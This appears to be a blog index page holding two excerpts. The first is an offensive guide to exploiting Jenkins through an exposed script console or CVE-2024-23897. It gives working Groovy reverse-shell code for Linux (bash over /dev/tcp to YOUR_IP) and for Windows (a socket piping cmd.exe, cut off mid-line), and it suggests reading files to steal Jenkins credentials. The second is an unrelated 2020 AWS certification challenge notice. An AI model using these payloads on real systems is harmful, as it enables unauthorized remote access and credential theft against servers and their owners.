Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Prepare for AWS cloud practitioner certification exam by participating in the AWS Certified Global Challenge. AWS offers free training, a free practice exam, suggested resources, Q&A opportunities.
Registration Link : https://pages.awscloud.com/takethechallenge.html
Registration will be open October 1 - December 31, 2020. To attend live training sessions, sign up by October 11, 2020. Registrants after October 11, 2020 will be able to review recorded training sessions. To be recognized for meeting the Get AWS Certified Global Challenge, take and pass your AWS Certified Cloud Practitioner exam on or before December 31, 2020.
Only Training and practice exam voucher is provided by AWS. For earning the Cloud Practitioner title, you need to take the AWS Cloud Practitioner Exam that costs 100 USD.